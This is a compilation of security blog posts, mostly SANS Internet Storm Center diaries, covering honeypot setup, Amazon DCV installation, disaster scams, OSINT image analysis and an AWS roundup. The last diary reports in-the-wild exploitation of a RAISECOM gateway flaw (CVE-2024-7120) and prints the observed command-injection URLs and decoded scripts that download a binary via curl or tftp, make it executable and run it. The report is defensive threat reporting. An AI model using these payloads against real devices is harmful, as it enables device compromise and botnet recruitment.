Kickstart Your DShield Honeypot [Guest Diary], (Thu, Oct 3rd)


[This is a Guest Diary by Joshua Gilman, an ISC intern as part of the SANS.edu BACS program]

Introduction

Setting up a DShield honeypot is just the beginning. The real challenge lies in configuring all the necessary post-installation settings, which can be tedious when deploying multiple honeypots. Drawing from personal experience and valuable feedback from past interns at the Internet Storm Center (ISC), I developed DShieldKickStarter to automate this often repetitive and time-consuming process.

What is DShieldKickStarter?

DShieldKickStarter is not a honeypot deployment tool. Instead, it’s a post-installation configuration script designed to streamline the setup of a honeypot environment after the DShield honeypot software has been installed. The script ensures that honeypots run efficiently with minimal manual effort by automating essential tasks such as setting up log backups, PCAP capture, and installing optional analysis tools.

Key Features of DShieldKickStarter

•    Automated Log Backups: The script organizes, compresses, and password-protects honeypot logs so that captured malicious files cannot be accidentally executed.
•    PCAP Capture Setup: Using tcpdump, it captures network traffic while excluding specific ports, ensuring only relevant data is logged (a minimal example follows this list).
•    Optional Tool Installation: Cowrieprocessor and JSON-Log-Country are included as optional tools. Both were invaluable during my internship for streamlining data analysis.
•    Helpful for Multiple Honeypots: When managing several honeypots, the script saves time by automating the same repetitive setup tasks on each sensor.
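As a minimal example of the PCAP exclusion, a capture along these lines ignores the honeypot's own management traffic. The interface name, output path, and excluded port here are placeholders, not necessarily the script's actual defaults:

# Capture everything except the honeypot's admin SSH port
$ sudo tcpdump -i eth0 -n -w /opt/honeypot/pcap/capture-$(date +%Y%m%d).pcap 'not port 12222'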

Step-by-Step Breakdown

The script automates several critical tasks:
1.    Creating Directories and Setting Permissions 
            Ensures the necessary directory structures for logs, backups, and PCAP data are in place, with proper permissions to secure sensitive files.
2.    Installing Required Packages 
             Installs essential tools such as tcpdump, git, and python3-pip, streamlining the log and packet capture setup.
3.    Configuring Log Rotation and Backups 
             Automatically rotates logs and stores them with password protection. PCAP files and honeypot logs are archived daily, and older backups are cleaned to save space.
4.    Automating PCAP Capture 
             Sets up tcpdump to capture network traffic, excluding predefined ports so that only relevant data is captured. The process is automated via cron jobs (a condensed sketch follows this list).
5.    Optional Tool Integration 
             The script optionally installs cowrieprocessor and JSON-Log-Country, two tools that were extremely helpful during my internship. These streamline log processing and help categorize attack data for further analysis.
6.    SCP Option for Off-Sensor Backup 
             If enabled, the script supports SCP transfers to a remote server, automating the secure transfer of backups for off-sensor storage.
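For a sense of what the script automates, here is a condensed sketch of steps 1, 3, and 6. The paths, archive password, and remote host are hypothetical placeholders; the actual script's choices may differ:

# 1. Create the directory structure with restrictive permissions
mkdir -p /opt/honeypot/{backups,pcap}
chmod -R 750 /opt/honeypot

# 3. Archive logs into a password-protected zip and prune old backups
zip -P infected /opt/honeypot/backups/logs-$(date +%Y%m%d).zip /srv/cowrie/var/log/cowrie/cowrie.json*
find /opt/honeypot/backups -type f -mtime +30 -delete

# 6. Optional off-sensor copy via SCP
scp /opt/honeypot/backups/logs-$(date +%Y%m%d).zip backup@backup-host.example:/srv/honeypot-backups/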

Who Benefits from This?

•    ISC Handlers and Interns: This tool provides a streamlined process for post-installation setup, allowing for faster honeypot deployment and data collection.
•    Cybersecurity Professionals: This tool's time-saving features can benefit anyone interested in setting up a DShield honeypot and contributing to threat intelligence efforts.

Tool Showcase

1. CowrieProcessor

Description

CowrieProcessor is a Python tool designed to process and summarize Cowrie logs, allowing for more accessible and detailed analysis. Cowrie logs can contain an overwhelming amount of data, as they track every interaction with the honeypot. CowrieProcessor condenses this data into a readable format, focusing on crucial elements like session details, IP addresses, commands entered by attackers, and malicious files downloaded during the session.

Usage and Benefits

The tool automates the parsing of Cowrie logs, providing a summary that includes key metrics such as session duration, attacker IPs, and the commands used during each attack. This is useful for quickly understanding attacker behavior without sifting through massive raw log files. With this, security teams can focus on actionable insights, such as blocking specific IPs or analyzing downloaded malware.

Screenshot Explanation

In the attached screenshot, CowrieProcessor provides a detailed view of a session from an attack on the honeypot. It shows session details, commands attempted by the attacker, and files downloaded, such as the malicious authorized_keys file. The easy-to-read output from CowrieProcessor highlights the attack flow, giving you insight into the malicious actor’s intentions.


CowrieProcessor output showing session details and malicious activities detected by the honeypot.

2. DShield SIEM (ELK)

Description

While DShield SIEM (ELK) is not installed by the script, it plays a crucial role in the further analysis and visualization of honeypot data. ELK (Elastic Stack) enables the collection, processing, and real-time visualization of honeypot data. It provides a centralized platform to track attacker behavior, detect patterns, and generate insights through interactive dashboards.

Usage and Benefits

Using ELK, you can monitor key metrics such as the most frequent attacker IPs, session types, and the commands attackers use. ELK dashboards also provide the ability to create custom queries using Kibana Query Language (KQL), which allows you to filter logs by specific attributes like failed logins, session durations, or malicious file downloads.


ELK dashboard showing attack data, top IP addresses, session activity, and trends over time.

Screenshot Explanation

The attached screenshot shows a detailed ELK dashboard summarizing honeypot data. On the left side, the "Top 50 IP" table displays the most active attacking IPs, while the center pie charts break down the types of logs (honeypot, webhoneypot, etc.) and session activity. The bar chart on the right visualizes Cowrie activity over time, helping analysts track attack patterns. KQL can filter this data even further, focusing on specific attacks or malicious behaviors.

KQL (Kibana Query Language)

One of the standout features of ELK is the ability to leverage KQL for deep-dive investigations. For instance, if you want to search for all failed login attempts, you can use a KQL query like:
event.outcome: "login.failed"

This query will instantly filter your logs, allowing you to pinpoint where and when login attempts failed. Another useful query might be filtering by source IP to track all actions from a particular attacker:
source.ip: "45.148.10.242"

With KQL, you can quickly analyze data across large volumes of logs, making it easy to detect anomalies, potential threats, or patterns in attacker behavior.

[1] https://github.com/DShield-ISC/dshield
[2] https://github.com/iamjoshgilman/DShieldKickStarter
[3] https://github.com/jslagrew/cowrieprocessor
[4] https://github.com/justin-leibach/JSON-Log-Country
[5] https://github.com/bruneaug/DShield-SIEM
[6] https://www.elastic.co/guide/en/kibana/current/kuery-query.html
[7] https://www.sans.edu/cyber-security-programs/bachelors-degree/
———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Security related Docker containers, (Wed, Oct 2nd)


Over the last 9 months or so, I've been putting together some docker containers that I find useful in my day-to-day malware analysis and forensicating. I have been putting them up on hub.docker.com and decided I might as well let others know they were there. In a couple of cases, I just found it easier to create a docker container than to try to remember to switch in and out of a Python virtualenv. In a couple of other cases, it avoids issues I've had with conflicting versions of installed packages. In every case, I'm tracking new releases so I can update my containers, and I usually do so within a couple of days of a new release. The ones that I have up at the moment are the following:
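For instance, running a containerized analysis tool against files in the current working directory sidesteps the virtualenv dance entirely. A hypothetical example follows; the image and file names are placeholders, not one of the actual containers:

# Mount the current directory into the container and run the tool against a sample
$ docker run --rm -it -v "$PWD":/work -w /work example/analysis-tool:latest sample.bin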

NICE DCV is now Amazon DCV with 2024.0 release


Today, NICE DCV has a new name. So long NICE DCV, welcome Amazon DCV. With the 2024.0 release, along with enhancements and bug fixes, NICE DCV has been rebranded as Amazon DCV.

The new name is now also used to consistently refer to the DCV protocol powering AWS managed services such as Amazon AppStream 2.0 and Amazon WorkSpaces.

What is Amazon DCV
Amazon DCV is a high-performance remote display protocol. It lets you securely deliver remote desktops and application streaming from any cloud or data center to any device, over varying network conditions. By using Amazon DCV with Amazon Elastic Compute Cloud (Amazon EC2), you can run graphics-intensive applications remotely on EC2 instances. You can then stream the results to more modest client machines, which eliminates the need for expensive dedicated workstations.

Amazon DCV supports both Windows and major flavors of Linux operating systems on the server side, giving you the flexibility to fit your organization’s needs. On the client side, desktops and streamed applications can be received with the native DCV client for Windows, Linux, or macOS, or in a web browser. The DCV remote server and client transfer only encrypted pixels, not data, so no confidential data is downloaded from the DCV server. When you choose to use Amazon DCV on Amazon Web Services (AWS) with EC2 instances, you can take advantage of the 108 AWS Availability Zones across 33 geographic Regions, plus 31 Local Zones, allowing your remote streaming services to scale globally.

Since Amazon acquired NICE 8 years ago, we’ve witnessed a diverse range of customers adopting DCV. From general-purpose users visualizing business applications to industry-specific professionals, DCV has proven to be versatile. For instance, artists have employed DCV to access powerful cloud workstations for their digital content creation and rendering tasks. In the healthcare sector, medical imaging professionals have used DCV for remote visualization and analysis of patient data. Geoscientists have used DCV to analyze reservoir simulation results, while engineers in manufacturing have used it to visualize computational fluid dynamics experiments. The education and IT support industries have benefited from collaborative sessions in DCV, in which multiple users can share a single desktop.

Notable customers include Quantic Dream, an award-winning game development studio that has harnessed DCV to create high-resolution, low-latency streaming services for their artists and developers. Tally Solutions, an enterprise resource planning (ERP) services provider, has employed DCV to securely stream its ERP software to thousands of customers. Volkswagen has used DCV to provide remote access to computer-aided engineering (CAE) applications for over 1,000 automotive engineers. Amazon’s Project Kuiper, an initiative to bring broadband connectivity to underserved communities, has used DCV for designing complex chips.

Within AWS, DCV has been adopted by several services to provide managed solutions to customers. For example, AppStream 2.0 uses DCV to offer secure, reliable, and scalable application streaming. Additionally, since 2020, Amazon WorkSpaces Streaming Protocol (WSP), which is built on DCV and optimized for high performance, has been available to Amazon WorkSpaces customers. Today, we’re also phasing out the WSP name and replacing it with DCV. Going forward, you will have DCV as a primary protocol choice in Amazon WorkSpaces.

What’s new with version 2024.0
Amazon DCV 2024.0 introduces several fixes and enhancements for improved performance, security, and ease of use. The 2024.0 release now supports the latest Ubuntu 24.04 LTS, bringing the latest security updates and extended long-term support to simplify system maintenance. The DCV client on Ubuntu 24.04 has built-in support for Wayland, offering better graphical rendering efficiency and enhanced application isolation. Additionally, DCV 2024.0 now enables the QUIC UDP protocol by default, allowing clients to benefit from an optimized streaming experience. The release also introduces the capability to blank the Linux host screen when a remote user is connected, preventing local access and interaction with the remote session.
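Related to the QUIC change above: if you need to toggle the QUIC frontend yourself on an existing server, it is controlled from the server configuration file. A minimal sketch based on the documented connectivity settings (key names reproduced from memory, so verify against the current DCV documentation):

# /etc/dcv/dcv.conf
[connectivity]
enable-quic-frontend=true
quic-port=8443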

How to get started
The easiest way to test DCV is to spin up a WorkSpaces instance from the WorkSpaces console, selecting one of the DCV-powered bundles, or to create an AppStream session. For this demo, however, I want to show you how to install the DCV server on an EC2 instance.

I installed the DCV server on two servers running on Amazon EC2, one running Windows Server 2022 and one running Ubuntu 24.04. I also installed the client on my macOS laptop. The client and server packages are available for download on our website. For both servers, make sure the security group authorizes inbound connections on UDP or TCP port 8443, the default port DCV uses.
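For example, with the AWS CLI (the security group ID and source CIDR below are placeholders for your own values):

# Allow DCV over TCP and over UDP (QUIC) on port 8443 from a trusted network
$ aws ec2 authorize-security-group-ingress --group-id sg-0123456789abcdef0 --protocol tcp --port 8443 --cidr 203.0.113.0/24
$ aws ec2 authorize-security-group-ingress --group-id sg-0123456789abcdef0 --protocol udp --port 8443 --cidr 203.0.113.0/24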

The Windows installation is straightforward: run the MSI installer, select Next at each step, and voilà. It was installed in less time than it took me to write this sentence.

The installation on Linux deserves a bit more care. Amazon Machine Images (AMI) for EC2 servers don’t include any desktop or graphical components. As a prerequisite, I had to install the X Window System and a window manager, and configure X to let users connect and start a graphical user interface session on the server. Fortunately, all these steps are well documented. Here is a summary of the commands I used.

# install desktop packages 
$ sudo apt install ubuntu-desktop

# install a desktop manager 
$ sudo apt install gdm3

# reboot
$ sudo reboot

After the reboot, I installed the DCV server packages:

# Install the server 
$ sudo apt install ./nice-dcv-server_2024.0.17794-1_amd64.ubuntu2404.deb
$ sudo apt install ./nice-xdcv_2024.0.625-1_amd64.ubuntu2404.deb

# (optional) install the DCV web viewer to allow clients to connect from a web browser
$ sudo apt install ./nice-dcv-web-viewer_2024.0.17794-1_amd64.ubuntu2404.deb

Because my server had no GPU, I also followed the documented steps to install the X11 dummy driver and configure X11 to use it.

Then, I started the service:

$ sudo systemctl enable dcvserver.service 
$ sudo systemctl start dcvserver.service 
$ sudo systemctl status dcvserver.service 

I created a user at the operating system level and assigned a password and a home directory. Then, I checked my setup on the server before trying to connect from the client.

$ sudo dcv list-sessions
There are no sessions available.

$ sudo dcv create-session console --type virtual --owner seb

$ sudo dcv list-sessions
Session: 'console' (owner:seb type:virtual)

Once my server configuration was ready, I started the DCV client on my laptop. I only had to enter the IP address of the server and the username and password of the user to initiate a session.

DCV client: entering the server IP address, then the username and password.

On my laptop, I opened a new DCV client window and connected to the other EC2 server. After a few seconds, I was able to remotely work with the Windows and the Ubuntu machine running in the cloud.

Two DCV client windows on macOS, connected to the Windows and Ubuntu servers.

In this example, I focus on installing Amazon DCV on a single EC2 instance. However, when building your own service infrastructure, you may want to explore the other components that are part of the DCV offering: Amazon DCV Session Manager, Amazon DCV Access Console, and Amazon DCV Connection Gateway.

Pricing and availability
Amazon DCV is free of charge when used on AWS. You only pay for the usage of AWS resources or services, such as EC2 instances, Amazon WorkSpaces desktops, or Amazon AppStream 2.0. If you plan to use DCV with on-premises servers, check the list of license resellers on our website.

Now go build your own servers with DCV.

— seb

Hurricane Helene Aftermath – Cyber Security Awareness Month, (Tue, Oct 1st)


For a few years now, October has been "National Cyber Security Awareness Month". This year, it is a good opportunity for a refresher on some scams that tend to happen around disasters like Hurricane Helene. The bigger the disaster, the more attractive it is to scammers.

Fake Donation Sites

Hurricane Katrina was the first event that triggered many fake donation websites. Since then, the number of fake donation websites has decreased somewhat, partly due to law enforcement attention and hopefully due to people becoming more aware of these scams. These scams either pretend to be a new charity/group attempting to help or impersonate an existing reputable charity. People in affected areas need help. Please only donate to groups you are familiar with and who were active before the event.

AI Social Media Posts

I believe these posts are mostly created to gain social media followers, maybe with the intent to later reel them into some scam. They often post dramatic images created with AI tools or copied from legitimate accounts. Some may just be interested in the monetization schemes some social media and video sites offer. Do not amplify these accounts. Strictly speaking, they are not "fake news," but legitimate news sources who go out to take pictures and gather information need exposure more than these fake accounts. Often, the fake accounts exaggerate the impact of the event and, in some cases, reduce the credibility of legitimate recovery efforts.

Malware

Attackers may use the event as a pretense to trick victims into opening attachments. In the past, we have seen e-mails and websites that spread malware claiming to include videos or images of the event. These attachments turn out to be executables installing malware.

Fake Assistance Scams

In the aftermath of a disaster, organizations often provide financial aid through loans. Scammers will apply for these loans using stolen identities traded online. It may take several months for the victim to become aware of the fraud, often when they are asked to repay the loan. Sadly, there is not much, if anything, you can do to protect yourself from these scams. The intent of the assistance is to be quick and unbureaucratic and to "sort things out later". You may have to prove that someone else used your information to apply for the loan.

"Grandparent Scam"

In this scam, a caller will pretend to be a relative or close friend, asking for money. These scams have become more convincing because scammers can often identify individuals in the disaster area and use them as a pretext to extort money. The caller may claim to be the individual (often they use SMS or other text messaging services), or they may claim to represent a police department or a hospital. Do not respond to any demands for money. Notify your local police department. If you are concerned, try to reach the agency calling you using a published number (note that Google listings can be fake). Due to the conditions in the affected area, the authorities there may be unable to respond; your own local law enforcement agency may be able to assist. They often have a published "non-emergency" number you can use instead of 911. Individuals in the affected area may not be reachable due to spotty power and cell service availability.

Final Word

Please let us know if we missed anything. A final word on some disaster preparedness items with an "IT flavor":

Broken high-voltage power line touching cable TV and phone lines.

  1. Have a plan to get out, and if you can get out: get out. You should not stay in the affected area unless you are part of the recovery effort.
  2. Cellular networks fail. Cellular networks tend to work pretty well during smaller disasters, but they need power, towers, and other infrastructure, which will fail in large-scale disasters. Satellite connectivity quickly becomes your only viable option (if you have power). If you have a phone with satellite emergency calling (for example, a recent iPhone), they offer a "demo mode" to familiarize you with the feature.
  3. If you are lucky enough to already have a Starlink setup, bring the antenna inside before the storm and disconnect the equipment from power to avoid spikes destroying it.
  4. Disconnect as many electric devices from outlets as possible during a power outage (or before power outages are expected). Power outages often come with power spikes and other irregular power events that can destroy sensitive electronics. Do not plug them back in until power is restored and stable.
  5. Even a downed phone or cable TV line can be energized. You may not see the high voltage line that is also down and touches the cable TV line. I took the picture on the right this weekend in my neighborhood of a high-voltage line touching the cable TV and phone line.

 


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Tool update: mac-robber.py and le-hex-to-ip.py, (Mon, Sep 30th)


One of the problems I've had since I originally wrote mac-robber.py [1][2][3] seven years ago is that, because of the underlying os.stat Python library, we couldn't get file creation times (B-times). Since the release of GNU coreutils 8.32 (or so), the statx() call has been available on Linux to provide the B-time, but Python out of the box doesn't yet support that call. Recently, though, I did some searches and discovered that for several years there has actually been a pip package called pystatx that exposes the statx() call and allows us to get the B-time. So, I updated the script. It now tries to import statx, and if it succeeds (probably only on relatively recent Linux distros where the pip package has been installed), it can now provide B-times. I also adjusted the formatting so the script will now give microsecond instead of millisecond resolution. I will probably write a Python version of mactime at some point so that we can actually take advantage of the additional resolution.
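As a quick check of whether your kernel and filesystem expose B-times at all, recent GNU coreutils stat (which also uses statx() under the hood) can print the birth time directly; a "-" means it isn't available:

# Print birth, access, modify, and change times for a file
$ stat --format='B: %w%nA: %x%nM: %y%nC: %z' /etc/hostname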

AWS Weekly Roundup: Jamba 1.5 family, Llama 3.2, Amazon EC2 C8g and M8g instances and more (Sep 30, 2024)


Every week, there’s a new Amazon Web Services (AWS) community event where you can network, learn something new, and immerse yourself in the community. When you’re in a community, everyone grows together, and no one is left behind. Last week was no exception. I can highlight the DACH AWS Community Day, where Viktoria Semaan closed with a talk titled How to Create Impactful Content and Build a Strong Personal Brand, and the Peru User Group, who organized two days of talks and learning opportunities: UGCONF & SERVERLESSDAY 2024, featuring Jeff Barr, who spoke about how to Create Your Own Luck. The community events continue, so check them out at Upcoming AWS Community Days.

Last week’s launches
Here are the launches that got my attention.

Jamba 1.5 family of models by AI21 Labs is now available in Amazon Bedrock – The Jamba 1.5 Large and 1.5 Mini models feature a 256k context window, one of the longest on the market, enabling complex tasks like lengthy document analysis. With native support for structured JSON output, function calling, and document processing, they integrate into enterprise workflows for specialized AI solutions. To learn more, read Jamba 1.5 family of models by AI21 Labs is now available in Amazon Bedrock, visit the AI21 Labs in Amazon Bedrock page, and read the documentation.

AWS Lambda now supports Amazon Linux 2023 runtimes in AWS GovCloud (US) Regions – These Amazon Linux 2023 runtimes offer the latest language features, including Python 3.12, Node.js 20, Java 21, .NET 8, and Ruby 3.3. They have smaller deployment footprints, updated libraries, and a new package manager. Additionally, you can also use the container base images to build and deploy functions as a container image.

Amazon SageMaker Studio now supports automatic shutdown of idle applications – You can now enable automatic shutdown of inactive JupyterLab and CodeEditor applications using Amazon SageMaker Distribution image v2.0 or newer. Administrators can set idle shutdown times at domain or user profile levels, with optional user customization. This cost control mechanism helps avoid charges for unused instances and is available across all AWS Regions where SageMaker Studio is offered.

Amazon S3 is implementing a default 128 KB minimum object size for S3 Lifecycle transition rules to any S3 storage class – Reduce transition costs for datasets with many small objects by decreasing transition requests. Users can override the default and customize minimum object sizes. Existing rules remain unchanged, but the new default applies to new or modified configurations.

AWS Lake Formation centralized access control for Amazon Redshift data sharing is now available in 11 additional Regions – Enabling granular permissions management, including table, column, and row-level access to shared Amazon Redshift data. It also supports tag-based access control and trusted identity propagation with AWS IAM Identity Center for improved security and simplified management.

Llama 3.2 generative AI models now available in Amazon Bedrock – The collection includes 90B and 11B parameter multimodal models for sophisticated reasoning tasks, and 3B and 1B text-only models for edge devices. These models support vision tasks, offer improved performance, and are designed for responsible AI innovation across various applications. These models support a 128K context length and multilingual capabilities in eight languages. Learn more about it in Introducing Llama 3.2 models from Meta in Amazon Bedrock.

Share AWS End User Messaging SMS resources across multiple AWS accounts – You can use AWS Resource Access Manager (RAM) to share phone numbers, sender IDs, phone pools, and opt-out lists. Additionally, Amazon SNS now delivers SMS text messages through AWS End User Messaging, offering enhanced features like two-way messaging and granular permissions. These updates provide greater flexibility and control for SMS messaging across AWS services.

AWS Serverless Application Repository now supports AWS PrivateLink – Enabling direct connections from Amazon Virtual Private Cloud (VPC) without internet exposure. This enhances security by keeping communication within the AWS network. Available in all Regions where AWS Serverless Application Repository is offered, it can be set up using the AWS Management Console or AWS Command Line Interface (AWS CLI).

Amazon SageMaker with MLflow now supports AWS PrivateLink for secure traffic routing – Enabling secure data transfer from Amazon Virtual Private Cloud (VPC) to MLflow Tracking Servers within the AWS network. This enhances protection of sensitive information by avoiding public internet exposure. Available in most AWS Regions, it improves security for machine learning (ML) and generative AI experimentation using MLflow.

Introducing Amazon EC2 C8g and M8g Instances – Enhanced performance for compute-intensive and general-purpose workloads. With up to three times more vCPUs, three times more memory, 75 percent more memory bandwidth, and two times more L2 cache, these instances improve data processing, scalability, and cost-efficiency for various applications including high performance computing (HPC), batch processing, and microservices. Read more in Run your compute-intensive and general purpose workloads sustainably with the new Amazon EC2 C8g, M8g instances.

Llama 3.2 models are now available in Amazon SageMaker JumpStart – These models offer various sizes from 1B to 90B parameters, support multimodal tasks, including image reasoning, and are more efficient for AI workloads. The 1B and 3B models can be fine-tuned, while Llama Guard 3 11B Vision supports responsible innovation and system-level safety. Learn more in Llama 3.2 models from Meta are now available in Amazon SageMaker JumpStart.

For a full list of AWS announcements, be sure to keep an eye on the What’s New at AWS page.

Other AWS news
Here are some additional projects, blog posts, and news items that you might find interesting:

Deploy generative AI agents in your contact center for voice and chat using Amazon Connect, Amazon Lex, and Amazon Bedrock Knowledge Bases – This solution enables low-latency customer interactions, answering queries from a knowledge base. Features include conversation analytics, automated testing, and hallucination detection in a serverless architecture.

How AWS WAF threat intelligence features help protect the player experience for betting and gaming customers – AWS WAF enhances bot protection for betting and gaming. New features include browser fingerprinting, automation detection, and ML models to identify coordinated bots. These tools combat scraping, fraud, distributed denial of service (DDoS) attacks, and cheating, safeguarding player experiences.

How to migrate 3DES keys from a FIPS to a non-FIPS AWS CloudHSM cluster – Learn how to securely transfer Triple Data Encryption Algorithm (3DES) keys from Federal Information Processing Standard (FIPS) hsm1 to non-FIPS hsm2 clusters using RSA-AES wrapping, without backups. This enables using new hsm2.medium instances with FIPS 140-3 Level 3 support, non-FIPS mode, increased key capacity, and mutual TLS (mTLS).

Upcoming AWS events
Check your calendars and sign up for upcoming AWS events:

AWS Summits – Join free online and in-person events that bring the cloud computing community together to connect, collaborate, and learn about AWS. These events offer technical sessions, demonstrations, and workshops delivered by experts. There is only one event left that you can still register for: Ottawa (October 9).

AWS Community Days – Join community-led conferences featuring technical discussions, workshops, and hands-on labs driven by expert AWS users and industry leaders from around the world. Upcoming AWS Community Days are scheduled for October 3 in the Netherlands and Romania, and on October 5 in Jaipur, Mexico, Bolivia, Ecuador, and Panama. I’m happy to share with you that I will be joining the Panama community on October 5.

AWS GenAI Lofts – Collaborative spaces and immersive experiences that showcase AWS’s expertise with the cloud and AI, while providing startups and developers with hands-on access to AI products and services, exclusive sessions with industry leaders, and valuable networking opportunities with investors and peers. Find a GenAI Loft location near you and don’t forget to register. I’ll be in the San Francisco lounge with some demos on October 15 at the Gen AI Developer Day. If you’re attending, feel free to stop by and say hello!

Browse all upcoming AWS-led in-person and virtual events and developer-focused events.

That’s all for this week. Check back next Monday for another Weekly Roundup!

Thanks to Dmytro Hlotenko and Diana Alfaro for the photos of their community events.

Eli

This post is part of our Weekly Roundup series. Check back each week for a quick roundup of interesting news and announcements from AWS!

OSINT – Image Analysis or More: Where, When, and Metadata [Guest Diary], (Wed, Sep 25th)


[This is a Guest Diary by Thomas Spangler, an ISC intern as part of the SANS.edu BACS program]

A picture is worth a thousand words, as the saying goes. Open-source information and basic image analysis can be valuable tools for investigators. The purpose of this blog is to demonstrate the power of image analysis and the associated tools for open-source intelligence (OSINT). Having recently completed SANS SEC497, I was inspired to share how image analysis can provide valuable information for investigations. This post will provide a step-by-step approach using a random image [1] pulled from the internet.

SAFETY FIRST

Always scan a file or URL prior to retrieving a target image. This action is particularly useful when retrieving information from suspicious or unknown websites. A tool like VirusTotal [2] makes this step very easy.

First, select your scan type:  File, URL, or Search.  In the case of a file, it can be dragged and dropped on the screen.

In this case, I used a known PDF file to generate the sample result shown below.

Now we are clear to proceed with the image analysis…

TARGET IMAGE

Our target image was randomly selected from the NY Times website.

Credit: Filip Singer, EPA

WHERE WAS THIS IMAGE TAKEN

A natural first question might be: where was this image taken? OSINT analysts use many tools, including image analysis, to answer questions like this one. As you will see, image analysis alone cannot answer this question. Other tools like Google searches, translation tools, and metadata can be combined with image analysis to provide discrete clues that come together into an answer.

Potentially identifiable or unique markings…

In looking for image clues, focus on context (e.g. bridge collapse and flooding), unique markers (e.g. signs, buildings, bridges), and geography.

With these clues in hand, we can now use tools like Google Lens [3] and Yandex [4] (if your organization or agency permits its use, given its Russian origin) for reverse image lookups and text-based searches. While most people think of Google searches in terms of text, Google Lens is the image search equivalent, which can be used to find additional clues. In this case, I used Google Lens with the original image and the image clues mentioned above to find relevant matches. Below are the Google Lens matches obtained from a search on the original image:

From the Google Lens results, the images from www.lusa.pt and TAG24 appear to be close matches. Note that the TAG24 description mentions Dresden and is written in German. Upon visiting the TAG24 website [5], we find a different image of the same location and an article in German.

Using another important OSINT tool, Google Translate, we can translate some of the text to English in order to find the exact bridge and location in question.

Voila…Carola Bridge.  A simple Google text search on Carola Bridge turns up an article from Euronews [6] that confirms the image location at the Carola Bridge in Dresden, Germany.  We can also use a Google Dork…maps:carola bridge…to find a map of the location:

WHEN

From the Euronews article, we also know that the bridge collapsed sometime between 11-12 September 2024 in the middle of the night.

An AP article [7] that also turned up in the previous Google search indicated that “crews were alerted around 3am”. An Engineering News Record article [8] confirms the collapse occurred on 11 September 2024, and a Deutsche Welle article [9] confirms that demolition of the fallen structure began on 13 September 2024.

We can conclude that this picture was taken sometime between 3am local time on 11 Sept 2024 and daylight hours on 13 Sept 2024.  With further investigation, using Google Street View and similar tools, we could have probably narrowed the timeline down even further.

METADATA

I wanted to touch on one other important topic…metadata.  Metadata (as shown in the details below from the reference image) presents interesting information such as location, size, imaging device, date, and time for the image in question.  Original images, videos, and files usually contain a treasure chest of information in the form of metadata.  Using Exiftool [10], the following data is returned on the target file in this blog:

It includes some basic information about the image size, encoding process, etc., but with original images, location, camera type, date, and time will all likely be included.  These pieces of metadata could drastically speed up any OSINT investigation.
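For reference, a typical invocation is a single command; the file name here is just a placeholder:

# Dump all metadata, showing which group (EXIF, XMP, etc.) each tag comes from
$ exiftool -a -G1 IMG_1234.jpg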

CONCLUSION

In conclusion, imagery can be an important starting point for OSINT investigations.  However, more cyber tools than just image analysis must be employed to answer some basic questions like who, where, and when.  In certain cases, an analyst needs to pay close attention to their own attribution (“being found”) when conducting an investigation.  Instead of using live web searches from a local machine, an analyst may need to use sock puppet accounts, VPN protection, and/or cloud-based hosts and even tools like Google Cache and the Wayback Machine for archived web sites to protect their identities and the fact that a target is being investigated.

Thank you to SEC497 instructor Matt Edmondson for piquing my interest in OSINT and for the skills developed during the course.

[1] nytimes.com
[2] virustotal.com
[3] https://chromewebstore.google.com/detail/download-google-lens-for/miijkofiplfeonkfmdlolnojlobmpman?hl=en
[4] Yandex.com/images
[5] https://www.tag24.de/thema/naturkatastrophen/hochwasser/hochwasser-dresden/hochwasser-in-dresden-pegel-prognosen-werden-sich-bestaetigen-3317729#google_vignette
[6] https://www.euronews.com/my-europe/2024/09/12/major-bridge-partially-collapses-into-river-in-dresden
[7] https://apnews.com/article/dresden-germany-bridge-collapse-carola-bridge-ad1ebf71f396d8984d2e79f9e6ba3f06
[8] https://www.enr.com/articles/59283-dramatic-bridge-failure-surprises-dresden-germany-officials
[9] https://www.dw.com/en/dresden-rushes-to-remove-collapsed-bridge-amid-flood-warning/a-70215802
[10] https://exiftool.org/
[11] https://www.sans.edu/cyber-security-programs/bachelors-degree/

———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Exploitation of RAISECOM Gateway Devices Vulnerability CVE-2024-7120, (Tue, Sep 24th)


Raisecom SOHO/enterprise gateway, MSG2200 and MSG2100E series.

Late in July, a researcher using the alias "NETSECFISH" published a blog post revealing a vulnerability in RAISECOM gateway devices [1]. The vulnerability affects the "vpn/list_base_Config.php" endpoint and allows for unauthenticated remote code execution. According to Shodan, about 25,000 vulnerable devices are exposed to the internet.

With a simple proof of concept available, it is no surprise that we see the vulnerability exploited. The first exploits were detected by our sensors on September 1st.

The graph above shows the number of attacks for this vulnerability we saw daily.

There are two distinct payloads that we have seen used so far:

 /vpn/list_base_config.php?type=mod&parts=base_config&template=%60cd%20/tmp%3B%20rm%20-rf%20tplink%3B%20curl%20http%3A//[redacted]/tplink%20--output%20tplink%3B%20chmod%20777%20tplink%3B%20./tplink%20raisecom%60

This decoded to the following script:

cd /tmp
rm -rf tplink
curl http://45.202.35.94/tplink --output tplink
chmod 777 tplink
./tplink

The second URL looks quite similar:

/vpn/list_base_config.php?type=mod&parts=base_config&template=%60cd%20/tmp%3B%20tftp%20-g%20-r%20ppc%20141.98.11.136%2069%3B%20chmod%20777%20ppc%3B%20./ppc%20raisee%60

Decoding to:

cd /tmp
tftp -g -r ppc 141.98.11.136 69
chmod 777 ppc
./ppc raisee

Interestingly, the second attempt uses TFTP, not HTTP, to download the malware. Sadly, neither file was available at the time I am writing this. But based on the naming of the files, it is fair to assume that this is one of the regular botnets hunting for vulnerable routers.
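If you want to check whether your own internet-exposed web servers are seeing the same scanning, a quick search of the access logs for the vulnerable endpoint is a reasonable first pass (the log path below is a placeholder for your environment):

# Look for exploit attempts against the vulnerable endpoint
$ grep -i 'list_base_config.php' /var/log/nginx/access.log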

I was not able to find details about this vulnerability or patches on RAISECOM's website [2].

[1] https://netsecfish.notion.site/Command-Injection-Vulnerability-in-RAISECOM-Gateway-Devices-673bc7d2f8db499f9de7182d4706c707
[2] https://en.raisecom.com/product/sohoenterprise-gateway


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.